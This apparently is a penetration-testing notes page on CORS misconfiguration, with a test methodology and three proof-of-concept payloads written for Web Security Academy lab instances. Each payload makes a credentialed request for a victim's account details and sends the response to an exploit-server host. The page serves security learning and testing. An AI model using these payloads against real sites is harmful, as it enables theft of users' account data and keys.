Cross-origin resource sharing (CORS)

Methodology

Look for any CORS-related headers, such as:
- Access-Control-Allow-Credentials
- Access-Control-Allow-Origin
Inject a custom Origin header and observe if it is reflected:
- Origin: http://malicious-server.com
Attempt to inject a null value as the Origin header.
Attempt to inject a trusted-looking origin to bypass basic checks:
- Origin: http://malicious-website.trusted-subdomain.com
Attempt to inject a malicious domain that includes a trusted subdomain as a subpath:
- Origin: http://trusted-subdomain.malicious-website.com
If step 4 or 5 works, try to find an XSS vulnerability to exploit the misconfigured CORS and achieve full exploitation.

POC - CORS vulnerability with basic origin reflection

Example of reflection:

<script>
	var xhr = new XMLHttpRequest();
	var url = "https://0a5700af03252f57800853a300030003.web-security-academy.net"
	xhr.onreadystatechange = function(){
		if (xhr.readyState == XMLHttpRequest.DONE){
			fetch("/log?key="+xhr.responseText)
		}
	}
	xhr.open("GET", url + "/accountDetails", true );
	xhr.withCredentials = true;
	xhr.send(null)
</script>

POC - CORS vulnerability with trusted null origin

Example of Trusted null origin:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0a710082034c5cc4821c98cb00790013.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='https://exploit-0a4100cc034e5ccc824a97f401f40059.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

POC - CORS vulnerability with trusted insecure protocols

Example of trusted insecre protocols

<script>
    document.location="http://stock.0aaa009c03ea093180d8355900d30095.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0aaa009c03ea093180d8355900d30095.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0aab0047030f09d6809b34e7011000f9.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

PreviousCross-site request forgery (CSRF)NextClickjacking

Last updated 9 months ago